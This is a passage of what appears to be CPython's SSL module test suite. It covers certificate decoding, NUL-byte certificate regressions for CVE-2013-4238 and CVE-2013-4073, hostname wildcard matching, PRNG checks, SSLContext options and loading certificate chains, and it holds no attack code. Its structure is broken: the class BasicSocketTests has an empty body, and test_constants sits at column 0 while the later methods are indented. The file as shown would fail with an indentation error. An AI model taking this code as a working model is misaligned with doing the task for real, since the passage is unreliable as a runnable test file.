    version the seconds are zeroed out. Other versions return the input
    unchanged.
    """
    if ssl._OPENSSL_API_VERSION != (0, 9, 8, 9, 15):
        return cert_time
    fmt = "%b %d %H:%M:%S %Y GMT"
    parsed = datetime.datetime.strptime(cert_time, fmt).replace(second=0)
    rendered = parsed.strftime(fmt)
    # %d adds leading zero but ASN1_TIME_print() uses leading space
    if rendered[4] == "0":
        rendered = rendered[:4] + " " + rendered[5:]
    return rendered
# Issue #9415: Ubuntu hijacks their OpenSSL and forcefully disables SSLv2
def skip_if_broken_ubuntu_ssl(func):
    """Decorator: skip `func` on Ubuntu's patched OpenSSL that breaks SSLv2.

    On builds without PROTOCOL_SSLv2 the function is returned unchanged.
    """
    if hasattr(ssl, 'PROTOCOL_SSLv2'):
        @functools.wraps(func)
        def f(*args, **kwargs):
            try:
                ssl.SSLContext(ssl.PROTOCOL_SSLv2)
            except ssl.SSLError:
                # platform.linux_distribution() was removed in Python 3.8;
                # fall back to an empty tuple so this branch cannot raise
                # AttributeError on modern interpreters.
                distro = getattr(platform, 'linux_distribution',
                                 lambda: ('', '', ''))()
                if (ssl.OPENSSL_VERSION_INFO == (0, 9, 8, 15, 15) and
                    distro == ('debian', 'squeeze/sid', '')):
                    raise unittest.SkipTest("Patched Ubuntu OpenSSL breaks behaviour")
            return func(*args, **kwargs)
        return f
    else:
        return func
# Decorator that skips a test when the ssl build lacks SNI support.
needs_sni = unittest.skipUnless(ssl.HAS_SNI, "SNI support needed for this test")
class BasicSocketTests(unittest.TestCase):
def test_constants(self):
    """All documented module-level ssl constants must exist."""
    # Touching a missing constant raises AttributeError and fails the test.
    for const in ("CERT_NONE", "CERT_OPTIONAL", "CERT_REQUIRED",
                  "OP_CIPHER_SERVER_PREFERENCE", "OP_SINGLE_DH_USE"):
        getattr(ssl, const)
    if ssl.HAS_ECDH:
        getattr(ssl, "OP_SINGLE_ECDH_USE")
    if ssl.OPENSSL_VERSION_INFO >= (1, 0):
        getattr(ssl, "OP_NO_COMPRESSION")
    self.assertIn(ssl.HAS_SNI, {True, False})
    self.assertIn(ssl.HAS_ECDH, {True, False})
    def test_random(self):
        """Exercise the RAND_* PRNG helpers: status, byte generation, seeding."""
        v = ssl.RAND_status()
        if support.verbose:
            sys.stdout.write("\n RAND_status is %d (%s)\n"
                             % (v, (v and "sufficient randomness") or
                                "insufficient randomness"))
        data, is_cryptographic = ssl.RAND_pseudo_bytes(16)
        self.assertEqual(len(data), 16)
        self.assertEqual(is_cryptographic, v == 1)
        if v:
            data = ssl.RAND_bytes(16)
            self.assertEqual(len(data), 16)
        else:
            self.assertRaises(ssl.SSLError, ssl.RAND_bytes, 16)
        # negative num is invalid
        self.assertRaises(ValueError, ssl.RAND_bytes, -5)
        self.assertRaises(ValueError, ssl.RAND_pseudo_bytes, -5)
        if hasattr(ssl, 'RAND_egd'):
            self.assertRaises(TypeError, ssl.RAND_egd, 1)
            self.assertRaises(TypeError, ssl.RAND_egd, 'foo', 1)
        ssl.RAND_add("this is a random string", 75.0)
    @unittest.skipUnless(os.name == 'posix', 'requires posix')
    def test_random_fork(self):
        """After fork(), parent and child PRNG streams must diverge."""
        status = ssl.RAND_status()
        if not status:
            self.fail("OpenSSL's PRNG has insufficient randomness")

        rfd, wfd = os.pipe()
        pid = os.fork()
        if pid == 0:
            # Child: send 16 pseudo-random bytes back through the pipe.
            try:
                os.close(rfd)
                child_random = ssl.RAND_pseudo_bytes(16)[0]
                self.assertEqual(len(child_random), 16)
                os.write(wfd, child_random)
                os.close(wfd)
            except BaseException:
                os._exit(1)
            else:
                os._exit(0)
        else:
            # Parent: read child's bytes and compare against our own.
            os.close(wfd)
            self.addCleanup(os.close, rfd)
            _, status = os.waitpid(pid, 0)
            self.assertEqual(status, 0)

            child_random = os.read(rfd, 16)
            self.assertEqual(len(child_random), 16)
            parent_random = ssl.RAND_pseudo_bytes(16)[0]
            self.assertEqual(len(parent_random), 16)

            self.assertNotEqual(child_random, parent_random)
    def test_parse_cert(self):
        """Certificate fields decoded by _test_decode_cert match the fixtures."""
        # note that this uses an 'unofficial' function in _ssl.c,
        # provided solely for this test, to exercise the certificate
        # parsing code
        p = ssl._ssl._test_decode_cert(CERTFILE)
        if support.verbose:
            sys.stdout.write("\n" + pprint.pformat(p) + "\n")
        self.assertEqual(p['issuer'],
                         ((('countryName', 'XY'),),
                          (('localityName', 'Castle Anthrax'),),
                          (('organizationName', 'Python Software Foundation'),),
                          (('commonName', 'localhost'),))
                        )
        # Note the next three asserts will fail if the keys are regenerated
        self.assertEqual(p['notAfter'], asn1time('Oct 5 23:01:56 2020 GMT'))
        self.assertEqual(p['notBefore'], asn1time('Oct 8 23:01:56 2010 GMT'))
        self.assertEqual(p['serialNumber'], 'D7C7381919AFC24E')
        self.assertEqual(p['subject'],
                         ((('countryName', 'XY'),),
                          (('localityName', 'Castle Anthrax'),),
                          (('organizationName', 'Python Software Foundation'),),
                          (('commonName', 'localhost'),))
                        )
        self.assertEqual(p['subjectAltName'], (('DNS', 'localhost'),))
        # Issue #13034: the subjectAltName in some certificates
        # (notably projects.developer.nokia.com:443) wasn't parsed
        p = ssl._ssl._test_decode_cert(NOKIACERT)
        if support.verbose:
            sys.stdout.write("\n" + pprint.pformat(p) + "\n")
        self.assertEqual(p['subjectAltName'],
                         (('DNS', 'projects.developer.nokia.com'),
                          ('DNS', 'projects.forum.nokia.com'))
                        )
        # extra OCSP and AIA fields
        self.assertEqual(p['OCSP'], ('http://ocsp.verisign.com',))
        self.assertEqual(p['caIssuers'],
                         ('http://SVRIntl-G3-aia.verisign.com/SVRIntlG3.cer',))
        self.assertEqual(p['crlDistributionPoints'],
                         ('http://SVRIntl-G3-crl.verisign.com/SVRIntlG3.crl',))
    def test_parse_cert_CVE_2013_4238(self):
        """NUL bytes embedded in certificate fields must survive parsing intact."""
        p = ssl._ssl._test_decode_cert(NULLBYTECERT)
        if support.verbose:
            sys.stdout.write("\n" + pprint.pformat(p) + "\n")
        subject = ((('countryName', 'US'),),
                   (('stateOrProvinceName', 'Oregon'),),
                   (('localityName', 'Beaverton'),),
                   (('organizationName', 'Python Software Foundation'),),
                   (('organizationalUnitName', 'Python Core Development'),),
                   (('commonName', 'null.python.org\x00example.org'),),
                   (('emailAddress', 'python-dev@python.org'),))
        self.assertEqual(p['subject'], subject)
        self.assertEqual(p['issuer'], subject)
        if ssl._OPENSSL_API_VERSION >= (0, 9, 8):
            san = (('DNS', 'altnull.python.org\x00example.com'),
                   ('email', 'null@python.org\x00user@example.org'),
                   ('URI', 'http://null.python.org\x00http://example.org'),
                   ('IP Address', '192.0.2.1'),
                   ('IP Address', '2001:DB8:0:0:0:0:0:1\n'))
        else:
            # OpenSSL 0.9.7 doesn't support IPv6 addresses in subjectAltName
            san = (('DNS', 'altnull.python.org\x00example.com'),
                   ('email', 'null@python.org\x00user@example.org'),
                   ('URI', 'http://null.python.org\x00http://example.org'),
                   ('IP Address', '192.0.2.1'),
                   ('IP Address', '<invalid>'))

        self.assertEqual(p['subjectAltName'], san)
    def test_DER_to_PEM(self):
        """PEM->DER->PEM->DER round-trips preserve the certificate bytes."""
        with open(SVN_PYTHON_ORG_ROOT_CERT, 'r') as f:
            pem = f.read()
        d1 = ssl.PEM_cert_to_DER_cert(pem)
        p2 = ssl.DER_cert_to_PEM_cert(d1)
        d2 = ssl.PEM_cert_to_DER_cert(p2)
        self.assertEqual(d1, d2)
        if not p2.startswith(ssl.PEM_HEADER + '\n'):
            self.fail("DER-to-PEM didn't include correct header:\n%r\n" % p2)
        if not p2.endswith('\n' + ssl.PEM_FOOTER + '\n'):
            self.fail("DER-to-PEM didn't include correct footer:\n%r\n" % p2)
    def test_openssl_version(self):
        """Sanity-check the three OPENSSL_VERSION* attributes against each other."""
        n = ssl.OPENSSL_VERSION_NUMBER
        t = ssl.OPENSSL_VERSION_INFO
        s = ssl.OPENSSL_VERSION
        self.assertIsInstance(n, int)
        self.assertIsInstance(t, tuple)
        self.assertIsInstance(s, str)
        # Some sanity checks follow
        # >= 0.9
        self.assertGreaterEqual(n, 0x900000)
        # < 3.0
        self.assertLess(n, 0x30000000)
        major, minor, fix, patch, status = t
        self.assertGreaterEqual(major, 0)
        self.assertLess(major, 3)
        self.assertGreaterEqual(minor, 0)
        self.assertLess(minor, 256)
        self.assertGreaterEqual(fix, 0)
        self.assertLess(fix, 256)
        self.assertGreaterEqual(patch, 0)
        self.assertLessEqual(patch, 63)
        self.assertGreaterEqual(status, 0)
        self.assertLessEqual(status, 15)
        # Version string as returned by {Open,Libre}SSL, the format might change
        if "LibreSSL" in s:
            self.assertTrue(s.startswith("LibreSSL {:d}.{:d}".format(major, minor)),
                            (s, t))
        else:
            self.assertTrue(s.startswith("OpenSSL {:d}.{:d}.{:d}".format(major, minor, fix)),
                            (s, t))
    @support.cpython_only
    def test_refcycle(self):
        """A wrapped SSLSocket must be collectable without gc cycle detection."""
        # Issue #7943: an SSL object doesn't create reference cycles with
        # itself.
        s = socket.socket(socket.AF_INET)
        ss = ssl.wrap_socket(s)
        wr = weakref.ref(ss)
        with support.check_warnings(("", ResourceWarning)):
            del ss
            self.assertEqual(wr(), None)
    def test_wrapped_unconnected(self):
        """I/O methods on an unconnected SSLSocket raise the socket's OSError."""
        # Methods on an unconnected SSLSocket propagate the original
        # OSError raise by the underlying socket object.
        s = socket.socket(socket.AF_INET)
        with ssl.wrap_socket(s) as ss:
            self.assertRaises(OSError, ss.recv, 1)
            self.assertRaises(OSError, ss.recv_into, bytearray(b'x'))
            self.assertRaises(OSError, ss.recvfrom, 1)
            self.assertRaises(OSError, ss.recvfrom_into, bytearray(b'x'), 1)
            self.assertRaises(OSError, ss.send, b'x')
            self.assertRaises(OSError, ss.sendto, b'x', ('0.0.0.0', 0))
    def test_timeout(self):
        """Wrapping a socket must preserve its configured timeout (issue #8524)."""
        # Issue #8524: when creating an SSL socket, the timeout of the
        # original socket should be retained.
        for timeout in (None, 0.0, 5.0):
            s = socket.socket(socket.AF_INET)
            s.settimeout(timeout)
            with ssl.wrap_socket(s) as ss:
                self.assertEqual(timeout, ss.gettimeout())
    def test_errors(self):
        """wrap_socket rejects bad cert/key combinations with the right errors."""
        sock = socket.socket()
        self.assertRaisesRegex(ValueError,
                        "certfile must be specified",
                        ssl.wrap_socket, sock, keyfile=CERTFILE)
        self.assertRaisesRegex(ValueError,
                        "certfile must be specified for server-side operations",
                        ssl.wrap_socket, sock, server_side=True)
        self.assertRaisesRegex(ValueError,
                        "certfile must be specified for server-side operations",
                        ssl.wrap_socket, sock, server_side=True, certfile="")
        with ssl.wrap_socket(sock, server_side=True, certfile=CERTFILE) as s:
            self.assertRaisesRegex(ValueError, "can't connect in server-side mode",
                                    s.connect, (HOST, 8080))
        # Nonexistent files must surface as ENOENT, not a generic SSL error.
        with self.assertRaises(OSError) as cm:
            with socket.socket() as sock:
                ssl.wrap_socket(sock, certfile=WRONGCERT)
        self.assertEqual(cm.exception.errno, errno.ENOENT)
        with self.assertRaises(OSError) as cm:
            with socket.socket() as sock:
                ssl.wrap_socket(sock, certfile=CERTFILE, keyfile=WRONGCERT)
        self.assertEqual(cm.exception.errno, errno.ENOENT)
        with self.assertRaises(OSError) as cm:
            with socket.socket() as sock:
                ssl.wrap_socket(sock, certfile=WRONGCERT, keyfile=WRONGCERT)
        self.assertEqual(cm.exception.errno, errno.ENOENT)
    def test_match_hostname(self):
        """Exhaustive positive/negative cases for ssl.match_hostname."""
        def ok(cert, hostname):
            # Must not raise.
            ssl.match_hostname(cert, hostname)
        def fail(cert, hostname):
            # Must raise CertificateError.
            self.assertRaises(ssl.CertificateError,
                              ssl.match_hostname, cert, hostname)

        cert = {'subject': ((('commonName', 'example.com'),),)}
        ok(cert, 'example.com')
        ok(cert, 'ExAmple.cOm')
        fail(cert, 'www.example.com')
        fail(cert, '.example.com')
        fail(cert, 'example.org')
        fail(cert, 'exampleXcom')

        cert = {'subject': ((('commonName', '*.a.com'),),)}
        ok(cert, 'foo.a.com')
        fail(cert, 'bar.foo.a.com')
        fail(cert, 'a.com')
        fail(cert, 'Xa.com')
        fail(cert, '.a.com')

        # only match one left-most wildcard
        cert = {'subject': ((('commonName', 'f*.com'),),)}
        ok(cert, 'foo.com')
        ok(cert, 'f.com')
        fail(cert, 'bar.com')
        fail(cert, 'foo.a.com')
        fail(cert, 'bar.foo.com')

        # NULL bytes are bad, CVE-2013-4073
        cert = {'subject': ((('commonName',
                              'null.python.org\x00example.org'),),)}
        ok(cert, 'null.python.org\x00example.org') # or raise an error?
        fail(cert, 'example.org')
        fail(cert, 'null.python.org')

        # error cases with wildcards
        cert = {'subject': ((('commonName', '*.*.a.com'),),)}
        fail(cert, 'bar.foo.a.com')
        fail(cert, 'a.com')
        fail(cert, 'Xa.com')
        fail(cert, '.a.com')

        cert = {'subject': ((('commonName', 'a.*.com'),),)}
        fail(cert, 'a.foo.com')
        fail(cert, 'a..com')
        fail(cert, 'a.com')

        # wildcard doesn't match IDNA prefix 'xn--'
        idna = 'püthon.python.org'.encode("idna").decode("ascii")
        cert = {'subject': ((('commonName', idna),),)}
        ok(cert, idna)
        cert = {'subject': ((('commonName', 'x*.python.org'),),)}
        fail(cert, idna)
        cert = {'subject': ((('commonName', 'xn--p*.python.org'),),)}
        fail(cert, idna)

        # wildcard in first fragment and  IDNA A-labels in sequent fragments
        # are supported.
        idna = 'www*.pythön.org'.encode("idna").decode("ascii")
        cert = {'subject': ((('commonName', idna),),)}
        ok(cert, 'www.pythön.org'.encode("idna").decode("ascii"))
        ok(cert, 'www1.pythön.org'.encode("idna").decode("ascii"))
        fail(cert, 'ftp.pythön.org'.encode("idna").decode("ascii"))
        fail(cert, 'pythön.org'.encode("idna").decode("ascii"))

        # Slightly fake real-world example
        cert = {'notAfter': 'Jun 26 21:41:46 2011 GMT',
                'subject': ((('commonName', 'linuxfrz.org'),),),
                'subjectAltName': (('DNS', 'linuxfr.org'),
                                   ('DNS', 'linuxfr.com'),
                                   ('othername', '<unsupported>'))}
        ok(cert, 'linuxfr.org')
        ok(cert, 'linuxfr.com')
        # Not a "DNS" entry
        fail(cert, '<unsupported>')
        # When there is a subjectAltName, commonName isn't used
        fail(cert, 'linuxfrz.org')

        # A pristine real-world example
        cert = {'notAfter': 'Dec 18 23:59:59 2011 GMT',
                'subject': ((('countryName', 'US'),),
                            (('stateOrProvinceName', 'California'),),
                            (('localityName', 'Mountain View'),),
                            (('organizationName', 'Google Inc'),),
                            (('commonName', 'mail.google.com'),))}
        ok(cert, 'mail.google.com')
        fail(cert, 'gmail.com')
        # Only commonName is considered
        fail(cert, 'California')

        # Neither commonName nor subjectAltName
        cert = {'notAfter': 'Dec 18 23:59:59 2011 GMT',
                'subject': ((('countryName', 'US'),),
                            (('stateOrProvinceName', 'California'),),
                            (('localityName', 'Mountain View'),),
                            (('organizationName', 'Google Inc'),))}
        fail(cert, 'mail.google.com')

        # No DNS entry in subjectAltName but a commonName
        cert = {'notAfter': 'Dec 18 23:59:59 2099 GMT',
                'subject': ((('countryName', 'US'),),
                            (('stateOrProvinceName', 'California'),),
                            (('localityName', 'Mountain View'),),
                            (('commonName', 'mail.google.com'),)),
                'subjectAltName': (('othername', 'blabla'), )}
        ok(cert, 'mail.google.com')

        # No DNS entry subjectAltName and no commonName
        cert = {'notAfter': 'Dec 18 23:59:59 2099 GMT',
                'subject': ((('countryName', 'US'),),
                            (('stateOrProvinceName', 'California'),),
                            (('localityName', 'Mountain View'),),
                            (('organizationName', 'Google Inc'),)),
                'subjectAltName': (('othername', 'blabla'),)}
        fail(cert, 'google.com')

        # Empty cert / no cert
        self.assertRaises(ValueError, ssl.match_hostname, None, 'example.com')
        self.assertRaises(ValueError, ssl.match_hostname, {}, 'example.com')

        # Issue #17980: avoid denials of service by refusing more than one
        # wildcard per fragment.
        cert = {'subject': ((('commonName', 'a*b.com'),),)}
        ok(cert, 'axxb.com')
        cert = {'subject': ((('commonName', 'a*b.co*'),),)}
        fail(cert, 'axxb.com')
        cert = {'subject': ((('commonName', 'a*b*.com'),),)}
        with self.assertRaises(ssl.CertificateError) as cm:
            ssl.match_hostname(cert, 'axxbxxc.com')
        self.assertIn("too many wildcards", str(cm.exception))
    def test_server_side(self):
        """server_hostname is rejected when wrapping in server-side mode."""
        # server_hostname doesn't work for server sockets
        ctx = ssl.SSLContext(ssl.PROTOCOL_SSLv23)
        with socket.socket() as sock:
            self.assertRaises(ValueError, ctx.wrap_socket, sock, True,
                              server_hostname="some.hostname")
    def test_unknown_channel_binding(self):
        """get_channel_binding raises ValueError for an unknown binding type."""
        # should raise ValueError for unknown type
        s = socket.socket(socket.AF_INET)
        with ssl.wrap_socket(s) as ss:
            with self.assertRaises(ValueError):
                ss.get_channel_binding("unknown-type")
    @unittest.skipUnless("tls-unique" in ssl.CHANNEL_BINDING_TYPES,
                         "'tls-unique' channel binding not available")
    def test_tls_unique_channel_binding(self):
        """tls-unique binding is None on sockets with no completed handshake."""
        # unconnected should return None for known type
        s = socket.socket(socket.AF_INET)
        with ssl.wrap_socket(s) as ss:
            self.assertIsNone(ss.get_channel_binding("tls-unique"))
        # the same for server-side
        s = socket.socket(socket.AF_INET)
        with ssl.wrap_socket(s, server_side=True, certfile=CERTFILE) as ss:
            self.assertIsNone(ss.get_channel_binding("tls-unique"))
    def test_dealloc_warn(self):
        """Dropping an open SSLSocket emits a ResourceWarning naming the socket."""
        ss = ssl.wrap_socket(socket.socket(socket.AF_INET))
        r = repr(ss)
        with self.assertWarns(ResourceWarning) as cm:
            ss = None
            support.gc_collect()
        self.assertIn(r, str(cm.warning.args[0]))
    def test_get_default_verify_paths(self):
        """get_default_verify_paths honors SSL_CERT_DIR/SSL_CERT_FILE env vars."""
        paths = ssl.get_default_verify_paths()
        self.assertEqual(len(paths), 6)
        self.assertIsInstance(paths, ssl.DefaultVerifyPaths)

        with support.EnvironmentVarGuard() as env:
            env["SSL_CERT_DIR"] = CAPATH
            env["SSL_CERT_FILE"] = CERTFILE
            paths = ssl.get_default_verify_paths()
            self.assertEqual(paths.cafile, CERTFILE)
            self.assertEqual(paths.capath, CAPATH)
    @unittest.skipUnless(sys.platform == "win32", "Windows specific")
    def test_enum_certificates(self):
        """enum_certificates yields (cert, encoding, trust) from Windows stores."""
        self.assertTrue(ssl.enum_certificates("CA"))
        self.assertTrue(ssl.enum_certificates("ROOT"))

        self.assertRaises(TypeError, ssl.enum_certificates)
        self.assertRaises(WindowsError, ssl.enum_certificates, "")

        trust_oids = set()
        for storename in ("CA", "ROOT"):
            store = ssl.enum_certificates(storename)
            self.assertIsInstance(store, list)
            for element in store:
                self.assertIsInstance(element, tuple)
                self.assertEqual(len(element), 3)
                cert, enc, trust = element
                self.assertIsInstance(cert, bytes)
                self.assertIn(enc, {"x509_asn", "pkcs_7_asn"})
                self.assertIsInstance(trust, (set, bool))
                if isinstance(trust, set):
                    trust_oids.update(trust)

        serverAuth = "1.3.6.1.5.5.7.3.1"
        self.assertIn(serverAuth, trust_oids)
    @unittest.skipUnless(sys.platform == "win32", "Windows specific")
    def test_enum_crls(self):
        """enum_crls yields (crl_bytes, encoding) tuples from the CA store."""
        self.assertTrue(ssl.enum_crls("CA"))
        self.assertRaises(TypeError, ssl.enum_crls)
        self.assertRaises(WindowsError, ssl.enum_crls, "")

        crls = ssl.enum_crls("CA")
        self.assertIsInstance(crls, list)
        for element in crls:
            self.assertIsInstance(element, tuple)
            self.assertEqual(len(element), 2)
            self.assertIsInstance(element[0], bytes)
            self.assertIn(element[1], {"x509_asn", "pkcs_7_asn"})
    def test_asn1object(self):
        """_ASN1Object constructors resolve OID/NID/name to the same record."""
        expected = (129, 'serverAuth', 'TLS Web Server Authentication',
                    '1.3.6.1.5.5.7.3.1')
        val = ssl._ASN1Object('1.3.6.1.5.5.7.3.1')
        self.assertEqual(val, expected)
        self.assertEqual(val.nid, 129)
        self.assertEqual(val.shortname, 'serverAuth')
        self.assertEqual(val.longname, 'TLS Web Server Authentication')
        self.assertEqual(val.oid, '1.3.6.1.5.5.7.3.1')
        self.assertIsInstance(val, ssl._ASN1Object)
        self.assertRaises(ValueError, ssl._ASN1Object, 'serverAuth')

        val = ssl._ASN1Object.fromnid(129)
        self.assertEqual(val, expected)
        self.assertIsInstance(val, ssl._ASN1Object)
        self.assertRaises(ValueError, ssl._ASN1Object.fromnid, -1)
        with self.assertRaisesRegex(ValueError, "unknown NID 100000"):
            ssl._ASN1Object.fromnid(100000)
        # Every resolvable NID must come back with well-typed fields.
        for i in range(1000):
            try:
                obj = ssl._ASN1Object.fromnid(i)
            except ValueError:
                pass
            else:
                self.assertIsInstance(obj.nid, int)
                self.assertIsInstance(obj.shortname, str)
                self.assertIsInstance(obj.longname, str)
                self.assertIsInstance(obj.oid, (str, type(None)))

        val = ssl._ASN1Object.fromname('TLS Web Server Authentication')
        self.assertEqual(val, expected)
        self.assertIsInstance(val, ssl._ASN1Object)
        self.assertEqual(ssl._ASN1Object.fromname('serverAuth'), expected)
        self.assertEqual(ssl._ASN1Object.fromname('1.3.6.1.5.5.7.3.1'),
                         expected)
        with self.assertRaisesRegex(ValueError, "unknown object 'serverauth'"):
            ssl._ASN1Object.fromname('serverauth')
    def test_purpose_enum(self):
        """Purpose.SERVER_AUTH / CLIENT_AUTH map to the expected ASN.1 objects."""
        val = ssl._ASN1Object('1.3.6.1.5.5.7.3.1')
        self.assertIsInstance(ssl.Purpose.SERVER_AUTH, ssl._ASN1Object)
        self.assertEqual(ssl.Purpose.SERVER_AUTH, val)
        self.assertEqual(ssl.Purpose.SERVER_AUTH.nid, 129)
        self.assertEqual(ssl.Purpose.SERVER_AUTH.shortname, 'serverAuth')
        self.assertEqual(ssl.Purpose.SERVER_AUTH.oid,
                              '1.3.6.1.5.5.7.3.1')

        val = ssl._ASN1Object('1.3.6.1.5.5.7.3.2')
        self.assertIsInstance(ssl.Purpose.CLIENT_AUTH, ssl._ASN1Object)
        self.assertEqual(ssl.Purpose.CLIENT_AUTH, val)
        self.assertEqual(ssl.Purpose.CLIENT_AUTH.nid, 130)
        self.assertEqual(ssl.Purpose.CLIENT_AUTH.shortname, 'clientAuth')
        self.assertEqual(ssl.Purpose.CLIENT_AUTH.oid,
                              '1.3.6.1.5.5.7.3.2')
    def test_unsupported_dtls(self):
        """Wrapping a datagram socket raises NotImplementedError (no DTLS)."""
        s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
        self.addCleanup(s.close)
        with self.assertRaises(NotImplementedError) as cx:
            ssl.wrap_socket(s, cert_reqs=ssl.CERT_NONE)
        self.assertEqual(str(cx.exception), "only stream sockets are supported")
        ctx = ssl.SSLContext(ssl.PROTOCOL_SSLv23)
        with self.assertRaises(NotImplementedError) as cx:
            ctx.wrap_socket(s)
        self.assertEqual(str(cx.exception), "only stream sockets are supported")
class ContextTests(unittest.TestCase):
    @skip_if_broken_ubuntu_ssl
    def test_constructor(self):
        """SSLContext accepts every known protocol and rejects anything else."""
        for protocol in PROTOCOLS:
            ssl.SSLContext(protocol)
        self.assertRaises(TypeError, ssl.SSLContext)
        self.assertRaises(ValueError, ssl.SSLContext, -1)
        self.assertRaises(ValueError, ssl.SSLContext, 42)
    @skip_if_broken_ubuntu_ssl
    def test_protocol(self):
        """The protocol attribute reflects the constructor argument."""
        for proto in PROTOCOLS:
            ctx = ssl.SSLContext(proto)
            self.assertEqual(ctx.protocol, proto)
    def test_ciphers(self):
        """set_ciphers accepts known lists and raises SSLError on nonsense."""
        ctx = ssl.SSLContext(ssl.PROTOCOL_TLSv1)
        ctx.set_ciphers("ALL")
        ctx.set_ciphers("DEFAULT")
        with self.assertRaisesRegex(ssl.SSLError, "No cipher can be selected"):
            ctx.set_ciphers("^$:,;?*'dorothyx")
    @skip_if_broken_ubuntu_ssl
    def test_options(self):
        """Context options can be OR-ed in, and cleared only on newer OpenSSL."""
        ctx = ssl.SSLContext(ssl.PROTOCOL_TLSv1)
        # OP_ALL | OP_NO_SSLv2 | OP_NO_SSLv3 is the default value
        self.assertEqual(ssl.OP_ALL | ssl.OP_NO_SSLv2 | ssl.OP_NO_SSLv3,
                         ctx.options)
        ctx.options |= ssl.OP_NO_TLSv1
        self.assertEqual(ssl.OP_ALL | ssl.OP_NO_SSLv2 | ssl.OP_NO_SSLv3 | ssl.OP_NO_TLSv1,
                         ctx.options)
        if can_clear_options():
            ctx.options = (ctx.options & ~ssl.OP_NO_SSLv2) | ssl.OP_NO_TLSv1
            self.assertEqual(ssl.OP_ALL | ssl.OP_NO_TLSv1 | ssl.OP_NO_SSLv3,
                             ctx.options)
            ctx.options = 0
            self.assertEqual(0, ctx.options)
        else:
            with self.assertRaises(ValueError):
                ctx.options = 0
    def test_verify_mode(self):
        """verify_mode defaults to CERT_NONE and validates assigned values."""
        ctx = ssl.SSLContext(ssl.PROTOCOL_TLSv1)
        # Default value
        self.assertEqual(ctx.verify_mode, ssl.CERT_NONE)
        ctx.verify_mode = ssl.CERT_OPTIONAL
        self.assertEqual(ctx.verify_mode, ssl.CERT_OPTIONAL)
        ctx.verify_mode = ssl.CERT_REQUIRED
        self.assertEqual(ctx.verify_mode, ssl.CERT_REQUIRED)
        ctx.verify_mode = ssl.CERT_NONE
        self.assertEqual(ctx.verify_mode, ssl.CERT_NONE)
        with self.assertRaises(TypeError):
            ctx.verify_mode = None
        with self.assertRaises(ValueError):
            ctx.verify_mode = 42
    @unittest.skipUnless(have_verify_flags(),
                         "verify_flags need OpenSSL > 0.9.8")
    def test_verify_flags(self):
        """verify_flags round-trips arbitrary flag combinations."""
        ctx = ssl.SSLContext(ssl.PROTOCOL_TLSv1)
        # default value
        tf = getattr(ssl, "VERIFY_X509_TRUSTED_FIRST", 0)
        self.assertEqual(ctx.verify_flags, ssl.VERIFY_DEFAULT | tf)
        ctx.verify_flags = ssl.VERIFY_CRL_CHECK_LEAF
        self.assertEqual(ctx.verify_flags, ssl.VERIFY_CRL_CHECK_LEAF)
        ctx.verify_flags = ssl.VERIFY_CRL_CHECK_CHAIN
        self.assertEqual(ctx.verify_flags, ssl.VERIFY_CRL_CHECK_CHAIN)
        ctx.verify_flags = ssl.VERIFY_DEFAULT
        self.assertEqual(ctx.verify_flags, ssl.VERIFY_DEFAULT)
        # supports any value
        ctx.verify_flags = ssl.VERIFY_CRL_CHECK_LEAF | ssl.VERIFY_X509_STRICT
        self.assertEqual(ctx.verify_flags,
                         ssl.VERIFY_CRL_CHECK_LEAF | ssl.VERIFY_X509_STRICT)
        with self.assertRaises(TypeError):
            ctx.verify_flags = None
    def test_load_cert_chain(self):
        """load_cert_chain handles combined/separate files, passwords and callbacks."""
        ctx = ssl.SSLContext(ssl.PROTOCOL_TLSv1)
        # Combined key and cert in a single file
        ctx.load_cert_chain(CERTFILE, keyfile=None)
        ctx.load_cert_chain(CERTFILE, keyfile=CERTFILE)
        self.assertRaises(TypeError, ctx.load_cert_chain, keyfile=CERTFILE)
        with self.assertRaises(OSError) as cm:
            ctx.load_cert_chain(WRONGCERT)
        self.assertEqual(cm.exception.errno, errno.ENOENT)
        with self.assertRaisesRegex(ssl.SSLError, "PEM lib"):
            ctx.load_cert_chain(BADCERT)
        with self.assertRaisesRegex(ssl.SSLError, "PEM lib"):
            ctx.load_cert_chain(EMPTYCERT)
        # Separate key and cert
        ctx = ssl.SSLContext(ssl.PROTOCOL_TLSv1)
        ctx.load_cert_chain(ONLYCERT, ONLYKEY)
        ctx.load_cert_chain(certfile=ONLYCERT, keyfile=ONLYKEY)
        ctx.load_cert_chain(certfile=BYTES_ONLYCERT, keyfile=BYTES_ONLYKEY)
        with self.assertRaisesRegex(ssl.SSLError, "PEM lib"):
            ctx.load_cert_chain(ONLYCERT)
        with self.assertRaisesRegex(ssl.SSLError, "PEM lib"):
            ctx.load_cert_chain(ONLYKEY)
        with self.assertRaisesRegex(ssl.SSLError, "PEM lib"):
            ctx.load_cert_chain(certfile=ONLYKEY, keyfile=ONLYCERT)
        # Mismatching key and cert
        ctx = ssl.SSLContext(ssl.PROTOCOL_TLSv1)
        with self.assertRaisesRegex(ssl.SSLError, "key values mismatch"):
            ctx.load_cert_chain(SVN_PYTHON_ORG_ROOT_CERT, ONLYKEY)
        # Password protected key and cert
        ctx.load_cert_chain(CERTFILE_PROTECTED, password=KEY_PASSWORD)
        ctx.load_cert_chain(CERTFILE_PROTECTED, password=KEY_PASSWORD.encode())
        ctx.load_cert_chain(CERTFILE_PROTECTED,
                            password=bytearray(KEY_PASSWORD.encode()))
        ctx.load_cert_chain(ONLYCERT, ONLYKEY_PROTECTED, KEY_PASSWORD)
        ctx.load_cert_chain(ONLYCERT, ONLYKEY_PROTECTED, KEY_PASSWORD.encode())
        ctx.load_cert_chain(ONLYCERT, ONLYKEY_PROTECTED,
                            bytearray(KEY_PASSWORD.encode()))
        with self.assertRaisesRegex(TypeError, "should be a string"):
            ctx.load_cert_chain(CERTFILE_PROTECTED, password=True)
        with self.assertRaises(ssl.SSLError):
            ctx.load_cert_chain(CERTFILE_PROTECTED, password="badpass")
        with self.assertRaisesRegex(ValueError, "cannot be longer"):
            # openssl has a fixed limit on the password buffer.
            # PEM_BUFSIZE is generally set to 1kb.
            # Return a string larger than this.
            ctx.load_cert_chain(CERTFILE_PROTECTED, password=b'a' * 102400)
        # Password callback
        def getpass_unicode():
            return KEY_PASSWORD
        def getpass_bytes():
            return KEY_PASSWORD.encode()
        def getpass_bytearray():
            return bytearray(KEY_PASSWORD.encode())
        def getpass_badpass():
            return "badpass"
        def getpass_huge():
            return b'a' * (1024 * 1024)
        def getpass_bad_type():
            return 9
        def getpass_exception():
            raise Exception('getpass error')
        class GetPassCallable:
            def __call__(self):
                return KEY_PASSWORD
            def getpass(self):
